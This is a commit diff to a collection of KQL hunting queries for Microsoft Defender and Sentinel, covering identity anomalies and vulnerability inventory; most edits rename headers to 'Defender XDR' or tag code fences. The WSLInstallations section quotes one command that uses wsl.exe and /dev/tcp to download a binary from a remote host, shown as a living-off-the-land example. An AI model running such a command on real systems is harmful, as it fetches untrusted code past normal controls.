Syntax Update

Defender For Identity/AnomalousGroupPolicyDiscovery.md

@@ -17,8 +17,7 @@ Potential false positive is a new Administrator that has not performed group pol
 An attacker queries Group Policy object to gain valuable information about the environment. 
 
 ## Defender For Endpoint
-
-```
+```KQL
 let PreviousActivity = materialize (
      IdentityQueryEvents
      | where Timestamp > ago(30d)
@@ -31,7 +30,7 @@ IdentityQueryEvents
 | where not(DeviceName has_any(PreviousActivity))
 ```
 ## Sentinel
-```
+```KQL
 let PreviousActivity = materialize (
      IdentityQueryEvents
      | where TimeGenerated > ago(30d)

Defender For Identity/AnomalousLDAPTraffic.md

@@ -28,7 +28,7 @@ An adversary has gained access to your network and performes LDAP queries to per
 - https://www.microsoft.com/en-us/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/
 
 ## Defender For Endpoint
-```
+```KQL
 // Variables to define the anomalous behaviour
 let starttime = 30d;
 let endtime = 1d;
@@ -62,7 +62,7 @@ TimeSeriesAlerts
 | where PerHourCount > TotalEventsThreshold
 ```
 ## Sentinel
-```
+```KQL
 // Variables to define the anomalous behaviour
 let starttime = 90d;
 let endtime = 1d;

Defender For Identity/UserAddedToSensitiveGroup.md

@@ -20,8 +20,7 @@ A attacker has added themself to a sensitive group and can perform priviliges ac
 - https://learn.microsoft.com/en-us/defender-for-identity/entity-tags#sensitive-entities
 
 ### Defender For Endpoint
-
-```
+```KQL
 let SensitiveGroups = dynamic(['Domain Admins', 'Enterprise Admins', 'Exchange Admins']); // Add your sensitive groups to this list
 IdentityDirectoryEvents
 | where Timestamp > ago(30d)
@@ -32,7 +31,7 @@ IdentityDirectoryEvents
 | where Group has_any (SensitiveGroups)
 ```
 ### Sentinel
-```
+```KQL
 let SensitiveGroups = dynamic(['Domain Admins', 'Enterprise Admins', 'Exchange Admins']); // Add your sensitive groups to this list
 IdentityDirectoryEvents
 | where TimeGenerated > ago(30d)

Vulnerability Management/Active-EOS-Software.md

@@ -1,6 +1,6 @@
 # End of Support software used 
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 DeviceTvmSoftwareInventory
 | where EndOfSupportStatus == "EOS Version" or EndOfSupportStatus == 

Vulnerability Management/BrowserExtension - InstalledExtensionsWithNotificationPermissions.md

@@ -1,6 +1,6 @@
 # Query the installed extensions with the most required permissions
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 let ExtentionsWithNotification = DeviceTvmBrowserExtensionsKB
      | where PermissionId contains "Notification"

Vulnerability Management/BrowserExtension - InstalledExtensionsWithTheMostRequiredPermissions.md

@@ -1,6 +1,6 @@
 # Query the installed extensions with the most required permissions
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 let PermissionInformation = DeviceTvmBrowserExtensionsKB
      | where IsPermissionRequired == "true"

Vulnerability Management/BrowserExtension - Top100DevicesWithTheMostBrowserExtensions.md

@@ -1,6 +1,6 @@
 # Top 100 devices with the most browser extensions installed
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 DeviceTvmBrowserExtensions
 | summarize

Vulnerability Management/BrowserExtension - Top100MostPermissiveExtensionsInstalled.md

@@ -1,6 +1,6 @@
 # Top 100 critical browser extensions with the most permissions required
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 DeviceTvmBrowserExtensions
 | where ExtensionRisk == "Critical"

Vulnerability Management/CISAKnowExploitsVulnerabilitiesDeviceTotal.md

@@ -11,7 +11,7 @@ The vulnerabilities is known to be exploited by threat actors, thus depending on
 #### References
 - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
 
-### Defender For Endpoint
+### Defender XDR
 ```
 Devices with the most know exploited vulnerabilities
 let KnowExploitesVulnsCISA = externaldata(cveID: string, vendorProject: string, product: string, vulnerabilityName: string, dateAdded: datetime, shortDescription: string, requiredAction: string, dueDate: datetime, 

Vulnerability Management/CISAKnowExploitsVulnerabilitiesTotalVulnerableDevices.md

@@ -1,6 +1,6 @@
 # Total vulnerable devices for known exploited vulnerabilities from CISA
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 let KnowExploitesVulnsCISA = externaldata(cveID: string, vendorProject: 
 string, product: string, vulnerabilityName: string, dateAdded: datetime, 

Vulnerability Management/CVEWithMetaSploitExploitDeviceTotal.md

@@ -1,6 +1,6 @@
 # Vulnerabilities that have an exploit available in MetaSploit by device
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 let MetaSploitExploitsWithAssignedCVE = externaldata(cveid: string)[@"https://feeds.ecrimelabs.net/data/metasploit-cve"] with (format="txt", ignoreFirstRecord=True);
 DeviceTvmSoftwareVulnerabilities

Vulnerability Management/Curl-CVE-2023-38545.md

@@ -5,7 +5,7 @@
 #### Description
 The maintainers of curl have informed us about two vulnerabilities in the software that will be fixed on the 11th of october. CVE-2023-38545 has a high serverity and affects both libcurl and the curl tool. This page can help you identify systems that run curl beforehand, in order for you to take imidiate action if needed. As advised by multiple security organisations your company should create an inventory of all systems that run curl. This can be done by running the following query in Defender For Endpoint.
 
-### Defender For Endpoint
+### Defender XDR
 ```
 // List all devices that have curl installed or use curl.
 let ProcessBasedDevices = DeviceProcessEvents
@@ -25,7 +25,7 @@ DeviceTvmSoftwareInventory
 //| distinct CombinedId, CombinedName
 ```
 
-### Defender For Endpoint
+### Defender XDR
 ```
 // List devices that have not been patched yet.
 // This query will only show results after MDE has indexed the vulnerable devices, thus no results are expected before the 11th of October.

Vulnerability Management/CveLookup.md

@@ -1,6 +1,6 @@
 # Lookup vulnerability information based on a CveID
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 let CVE = "CVE-2022-3602"; // Add your CVEid here
 DeviceTvmSoftwareVulnerabilities

Vulnerability Management/Device-Configuration-Not-Compliant.md

@@ -1,6 +1,6 @@
 # Device congifuration not compliant 
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 DeviceTvmSecureConfigurationAssessment
 | join DeviceTvmSecureConfigurationAssessmentKB on ConfigurationId

Vulnerability Management/Device-EDR-Configuration-Not-Compliant.md

@@ -1,6 +1,6 @@
 # Device EDR settings are not compliant
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 DeviceTvmSecureConfigurationAssessment
 | join DeviceTvmSecureConfigurationAssessmentKB on ConfigurationId

Vulnerability Management/Devices-With-Recent-Exploitable-Vulnerability.md

@@ -1,6 +1,6 @@
 # Devices with a recent vulnerability that is exploitable
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 let timeframe = 30d; //Customizable h = hours, d = days
 let ExploitableVulnerabilities = materialize 

Vulnerability Management/DomainControllersWithTheMostVulnerabilities.md

@@ -1,6 +1,6 @@
 # Domain Controllers with the most vulnerabilities
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 let AllDomainControllers =
      DeviceNetworkEvents

Vulnerability Management/DueDatePassedCISAKnownExploitedVulnerability.md

@@ -14,7 +14,7 @@ Known exploited vulnerabilities are actively exploited by adversaries and need t
 - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
 - https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 let KnowExploitesVulnsCISA = externaldata(cveID: string, vendorProject: string, product: string, vulnerabilityName: string, dateAdded: datetime, shortDescription: string, requiredAction: string, dueDate: datetime, notes: string)[@"https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv"] with (format="csv", ignoreFirstRecord=True); 
 DeviceTvmSoftwareVulnerabilities 
@@ -35,4 +35,4 @@ DeviceTvmSoftwareVulnerabilities
 | extend DueDateExceededByDays = datetime_diff('day', now(), dueDate), TotalVulnerableDevices = array_length(VulnerableDevices) 
 | project-reorder CveId, vendorProject, DueDateExceededByDays, TotalVulnerableDevices 
 | sort by DueDateExceededByDays, TotalVulnerableDevices
-```
+```

Vulnerability Management/InboundSSHConnectionToVulnerableXZMachine.md

@@ -22,7 +22,7 @@ Exploitation of CVE-2024-3094.
 - https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094
 - https://www.openwall.com/lists/oss-security/2024/03/29/4
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 let VulnerableXZDevices = DeviceTvmSoftwareInventory
     | where SoftwareName has "xz"
@@ -47,4 +47,4 @@ DeviceNetworkEvents
 | where InitiatingProcessFileName contains "ssh"
 | extend GeoIPInfo = geo_info_from_ip_address(RemoteIP)
 | extend country = tostring(parse_json(GeoIPInfo).country), state = tostring(parse_json(GeoIPInfo).state), city = tostring(parse_json(GeoIPInfo).city), latitude = tostring(parse_json(GeoIPInfo).latitude), longitude = tostring(parse_json(GeoIPInfo).longitude)
-```
+```

Vulnerability Management/InternetFacingDevicesWithAvailableExploits.md

@@ -18,7 +18,7 @@ The risk of exploits on internet facing servers is higher, because they could be
 - https://attack.mitre.org/techniques/T1190/
 - https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/discovering-internet-facing-devices-using-microsoft-defender-for/ba-p/3778975
 
-### Defender For Endpoint
+### Defender XDR
 ```
 // Collect all internet facing devices
 let InternetFacingDevices = DeviceInfo

Vulnerability Management/MostExploitedVulnerabilities2022.md

@@ -35,7 +35,7 @@ Codeblock source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23
 - https://www.bleepingcomputer.com/news/security/fbi-cisa-and-nsa-reveal-top-exploited-vulnerabilities-of-2022/
 - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a
 
-### Defender For Endpoint
+### Defender XDR
 ```
 // Listing of the most exploited vulnerabilities of 2022.
 let 2022MostExploited = dynamic(['CVE-2021-34473', 'CVE-2021-31207', 'CVE-2021-34523', 'CVE-2018-13379', 'CVE-2021-40539', 'CVE-2021-26084', 'CVE-2021- 44228', 'CVE-2022-22954', 'CVE-2022-22960', 'CVE-2022-1388', 'CVE-2022-30190', 'CVE-2022-26134']);

Vulnerability Management/NewActiveCISAKnownExploitedVulnerabilityDetected.md

@@ -20,7 +20,7 @@ Known exploited vulnerabilities are actively exploited by adversaries and need t
 - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
 - https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 // Define new
 let NewThreshold = 1d;
@@ -46,4 +46,4 @@ DeviceTvmSoftwareVulnerabilities
     | where dateAdded > ago(NewThreshold)) 
     on $left.CveId == $right.cveID
 | project-reorder DeviceName, CveId, vendorProject, vulnerabilityName, dateAdded, shortDescription
-```
+```

Vulnerability Management/OpenSSLVulnerableDevices.md

@@ -1,6 +1,6 @@
 # List all the vulnerable devices for the OpenSSL critical vulnerability (nov 2022)
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 DeviceTvmSoftwareInventory
 | where SoftwareName contains "openssl"

Vulnerability Management/Pivot - DeviceVulnerabilities.md

@@ -5,7 +5,7 @@
 #### Description
 This query returns a row for each device with the amount of Critical, High, Medium and Low Vulnerabilities that device has.  
 
-## Defender For Endpoint
+## Defender XDR
 ```
 DeviceTvmSoftwareVulnerabilities
 | project DeviceName, VulnerabilitySeverityLevel

Vulnerability Management/PrioritizeSecureConfiguration.md

@@ -15,4 +15,4 @@ DeviceTvmSecureConfigurationAssessment
 | join kind=inner DeviceTvmSecureConfigurationAssessmentKB on ConfigurationId
 | sort by ConfigurationImpact, TotalDevices
 | project-reorder ConfigurationId, ConfigurationImpact, TotalDevices, ConfigurationName,  ConfigurationCategory, ConfigurationSubcategory
-```
+```

Vulnerability Management/SentinelAnalyticsRuleNewCISAKnowExploitedVulnerabilityAdded.md

@@ -96,4 +96,4 @@ KnowExploitesVulnsCISA
         }
     ]
 }
-```
+```

Vulnerability Management/Top-Devices-Most-Exploitable-Vulnerabilities.md

@@ -1,6 +1,6 @@
 # Top 10 devices with the most exploitable vulnerabilities
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 let ExploitableVulnerabilities = materialize 
 (DeviceTvmSoftwareVulnerabilitiesKB

Vulnerability Management/Top-Devices-Most-Vulnerabilities.md

@@ -1,6 +1,6 @@
 # Top 10 devices with the most Critical and High vulnerabilities
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 DeviceTvmSoftwareVulnerabilities
 | where VulnerabilitySeverityLevel has_any ('critical', 'High')

Vulnerability Management/Upcomming-EOS-Software.md

@@ -1,6 +1,6 @@
 # Upcomming End of Support software used 
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 DeviceTvmSoftwareInventory
 | where EndOfSupportStatus == "Upcoming EOS Version"

Vulnerability Management/Visualization - BrowserExtension - MostCommonCricitalExtensions.md

@@ -1,6 +1,6 @@
 # Most common installed cricital extensions visualised
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 DeviceTvmBrowserExtensions
 | where ExtensionRisk == "Critical"

Vulnerability Management/Visualization - ExposureLevels.md

@@ -8,7 +8,7 @@ This query visualizes the onboarded devices and their exposure level in a PieCha
 #### References
 - https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/tvm-exposure-score?view=o365-worldwide
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 DeviceInfo
 | where Timestamp > ago(30d)
@@ -25,4 +25,4 @@ DeviceInfo
 | summarize arg_max(TimeGenerated, *) by DeviceId
 | summarize Total = count() by ExposureLevel
 | render piechart with(title="Overview Exposure Level")
-```
+```

Vulnerability Management/Visualization - VulnerabilitiesBySeverity.md

@@ -1,6 +1,6 @@
 # Vulnerabilities visualized in a Piechart
 ----
-### Defender For Endpoint
+### Defender XDR
 ```
 DeviceTvmSoftwareVulnerabilities
 | summarize count() by VulnerabilitySeverityLevel

Vulnerability Management/VulnerabilitiesWithAvailablePOC.md

@@ -11,7 +11,7 @@ The vulnerabilities is known to be have a POC available, which increases the cha
 #### References
 - https://github.com/tg12/PoC_CVEs
 
-### Defender For Endpoint
+### Defender XDR
 ```
 // Extract the CVE IDs that have an available POC
 let VulnerabilitiesWithPOC = externaldata(CVE: string, URL: string )[@"https://raw.githubusercontent.com/tg12/PoC_CVEs/main/cve_links.csv"] with (format="csv", ignoreFirstRecord=True);

Vulnerability Management/WSLInstallations.md

@@ -19,7 +19,7 @@ wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/
 - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
 
-## Defender For Endpoint
+## Defender XDR
 ```
 let WSLDevices = DeviceProcessEvents
 | where Timestamp > ago(30d)
@@ -28,4 +28,4 @@ let WSLDevices = DeviceProcessEvents
 DeviceInfo
 | where DeviceId in (WSLDevices)
 | summarize arg_max(Timestamp, *) by DeviceId
-```
+```

Vulnerability Management/WeakSSHVersionUsed.md

@@ -1,6 +1,6 @@
 # Detect the usage of weak SSH sessions
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 DeviceNetworkEvents